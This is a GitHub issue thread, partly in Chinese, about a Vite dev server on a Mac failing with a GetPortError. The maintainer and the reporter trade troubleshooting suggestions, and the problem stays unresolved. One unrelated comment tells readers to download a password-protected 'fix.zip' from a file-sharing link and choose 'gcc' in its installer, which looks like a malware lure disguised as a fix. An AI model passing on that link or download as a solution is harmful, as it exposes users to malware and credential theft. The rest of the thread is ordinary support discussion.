### ISSUE TITLE
项目启动不起来，启动报错，但是我其他的vite项目是正常启动的

### ISSUE THREAD

**Issue by judapeng** [zhangyao1990/elegant-admin#6]
error when starting dev server:
GetPortError: Unable to find a random port on any host
    at getRandomPort (file:///Users/carrier/VscodeProjects/base-management-vue3/node_modules/.pnpm/get-port-please@3.1.2/node_modules/get-port-please/dist/index.mjs:335:11)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async detectPort (file:///Users/carrier/VscodeProjects/base-management-vue3/node_modules/.pnpm/unplugin-turbo-console@1.8.9_esbuild@0.21.5_rollup@4.18.0_vite@5.3.2_@types+node@20.14.9_sass_lhbg4kxw7k7hd4ja73dxqszfcu/node_modules/unplugin-turbo-console/dist/chunk-WPW6GWZS.js:564:22)
    at async configureServer (file:///Users/carrier/VscodeProjects/base-management-vue3/node_modules/.pnpm/unplugin-turbo-console@1.8.9_esbuild@0.21.5_rollup@4.18.0_vite@5.3.2_@types+node@20.14.9_sass_lhbg4kxw7k7hd4ja73dxqszfcu/node_modules/unplugin-turbo-console/dist/chunk-WPW6GWZS.js:597:11)
    at async _createServer (file:///Users/carrier/VscodeProjects/base-management-vue3/node_modules/.pnpm/vite@5.3.2_@types+node@20.14.9_sass@1.77.6_terser@5.31.1/node_modules/vite/dist/node/chunks/dep-C1-ZB6nQ.js:63365:20)
    at async CAC.<anonymous> (file:///Users/carrier/VscodeProjects/base-management-vue3/node_modules/.pnpm/vite@5.3.2_@types+node@20.14.9_sass@1.77.6_terser@5.31.1/node_modules/vite/dist/node/cli.js:735:20)
 ELIFECYCLE  Command failed with exit code 1.

电脑型号： mac  A2141

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zhangyao1990** [comment]
试试vite.config.js把端口改一下。。

**Comment by judapeng** [comment]
> 试试vite.config.js把端口改一下。。

主要是很奇怪，我其他的vite项目能用，就你这个起不起来，但是你的项目我在其他电脑里也可以正常启动，就这个电脑不行。还有系统兼容性问题嘛。。。

**Comment by zhangyao1990** [comment]
没碰到过，看报错像是端口问题，可以把试试把node_modules、pnpm-lock.yaml删除了重新下载，

**Comment by judapeng** [comment]
> 没碰到过，看报错像是端口问题，可以把试试把node_modules、pnpm-lock.yaml删除了重新下载，

这种方法也试过了，等你遇到再看看吧 ，我就遇到这一次这台电脑有问题可能。
